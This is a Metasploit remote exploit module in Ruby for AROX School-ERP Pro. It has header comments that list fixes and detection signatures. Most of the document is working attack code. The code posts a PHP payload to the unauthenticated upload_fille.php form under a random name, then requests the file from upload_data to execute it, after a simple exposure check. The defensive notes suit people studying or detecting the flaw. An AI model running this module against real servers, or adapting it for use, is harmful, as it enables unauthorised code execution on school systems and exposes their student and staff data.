##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
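# Metasploit remote exploit module for AROX School-ERP Pro.
#
# Root cause, as given in the module description: "upload_fille.php" (and
# "import_stud.php") have their session start/check calls commented out, so
# the upload form can be reached without logging in. The module uploads a
# PHP payload through that form and then requests it from "upload_data".
#
# Defensive takeaways visible from this flow:
# - Fix: restore the session check in both scripts, restrict accepted upload
#   types, and keep uploaded files where the web server will not run them as
#   PHP.
# - Detection: an unauthenticated multipart POST to
#   ".../greatbritain/greatbritain/upload_fille.php" followed by a GET for a
#   ".php" file under ".../upload_data/" is the request pair this module
#   produces. The upload uses the fixed User-Agent "Mozilla" and an
#   eight-letter lowercase file name.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => "AROX School-ERP Pro Unauthenticated Remote Code Execution",
      'Description' => %q(
        This module exploits a command execution vulnerability in AROX School-ERP.
        "import_stud.php" and "upload_fille.php" do not have session control.
        Session start/check functions in Line 8,9,10 are disabled with slashes.
        Therefore an unathenticated user can execute the command on the system.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'],
          ['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      'Privileged' => false,
      'DisclosureDate' => "Jun 17 2019",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
      ]
    )
  end

  # Requests the uploaded file from the "upload_data" directory.
  #
  # NOTE(review): the name shadows Kernel#exec inside this class; it is kept
  # so existing callers keep working.
  #
  # @param shell [String] file name previously stored by upload_shell
  # @return the result of send_request_cgi (nil when no response arrives)
  def exec(shell)
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", shell.to_s) # shell url
    })
  end

  # Posts the payload to "upload_fille.php" as a multipart form upload under a
  # random eight-letter ".php" name and records that name in @shell.
  #
  # @param check unused; kept for compatibility with the existing call site
  # @return [true] when the response is HTTP 200 and contains "Successfully"
  # @raise via fail_with(Failure::NoAccess) on any other outcome
  def upload_shell(check)
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = fname

    pdata = Rex::MIME::Message.new
    pdata.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"")
    pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"')
    data = pdata.to_s

    # Announce the attempt before sending, so the message matches what has
    # actually happened when the operator reads it.
    print_status("Trying to upload #{fname}")

    res = send_request_cgi({
      'method' => 'POST',
      'data' => data,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
      'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
    })

    return true if res && res.code == 200 && res.body =~ /Successfully/

    # fail_with raises, so nothing after it would run.
    fail_with(Failure::NoAccess, 'Error occurred during uploading!')
  end

  # Runs check, uploads the payload and then requests it.
  def exploit
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    if upload_shell(true)
      print_good("Upload successfully.")
      exec(@shell)
    end
  end

  # Probes "upload_fille.php" with an unauthenticated GET.
  #
  # NOTE(review): a 200 response that mentions the script name shows only that
  # the page is reachable without a session, not that an upload is accepted.
  # Treat Vulnerable here as "endpoint exposed"; exploit compares against this
  # exact code, so it is left unchanged.
  #
  # @return [Exploit::CheckCode] Unknown without a response, Vulnerable when
  #   the page answers 200 and contains "upload_fille.php", Safe otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    # The dot is escaped so only the literal file name matches.
    if res.code == 200 && res.body =~ /upload_fille\.php/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end
end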